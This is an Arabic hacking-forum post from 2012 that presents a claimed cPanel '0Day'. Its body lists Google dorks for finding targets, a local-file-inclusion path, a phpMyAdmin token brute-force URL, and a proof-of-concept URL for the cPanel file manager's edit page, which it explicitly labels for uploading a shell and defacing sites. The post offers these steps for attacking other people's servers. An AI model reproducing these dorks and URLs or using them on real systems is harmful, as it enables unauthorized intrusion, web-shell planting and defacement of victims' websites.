الموضوع: [0Day] Cpanel Exploit
عرض مشاركة واحدة
قديم 10-29-2012, 09:09 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي [0Day] Cpanel Exploit


السلام عليكم ورحمة الله وبركاتة

كيف حال اعضاء العناكب

اتركم مع الثغرة

موفقين خير #

كود PHP:
-------------------------------------------------------------------
Author    CyberCode Khorasan [0xCCBF]
Thanks to All Khorasan CyberArmy Member (Special toCep Engking,  JinCornAn0nym0uZ-17cliZAcehHitcherCFRXTreMistPKShadowDR.  NinjaDB Bust3rBagus Hacks)


LFI
---------------------------------
DORK => inurl:/frontend/x3/filemanager/dir.html?dir=

Brute-Force Attack (md5-hash)
---------------------------------
DORK => inurl:/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
POC  => http://[sites]/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]

Edit Files (upload shell deface)
------------------------------------
DORK => inurl:/frontend/x3/filemanager/editit.html?file=
POC  =>  http://[sites]/frontend/x3/filemanager/editit.html?file=[file_name]&fileop=&dir=[path]&dirop=&charset=&file_charset=utf-8&baseurl=&basedir=

[file_name] = index.phpindex.htmletc
[path]      = /home/[user]/ 



F0DayD Cpanel Exploit

   

رد مع اقتباس